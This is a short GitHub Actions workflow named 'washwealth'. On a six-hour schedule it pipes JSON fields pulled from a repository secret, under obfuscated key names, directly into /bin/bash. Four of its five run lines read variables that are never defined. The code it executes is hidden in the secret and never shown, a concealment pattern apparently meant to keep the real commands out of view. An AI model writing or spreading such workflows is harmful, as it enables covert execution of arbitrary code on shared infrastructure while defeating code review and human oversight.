name: washwealth
on:
  workflow_dispatch:
  schedule:
    - cron: '3 0/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: washwealth
        env:
          f93: ${{ secrets.f93 }}
        run: |
          echo $f93 | jq -r .x4388 | /bin/bash
          echo $g4121 | jq -r .zh7283 | /bin/bash
          echo $mst76 | jq -r .dphmu033 | /bin/bash
          echo $v433 | jq -r .ufdkw9 | /bin/bash
          echo $un2 | jq -r .ftz7 | /bin/bash

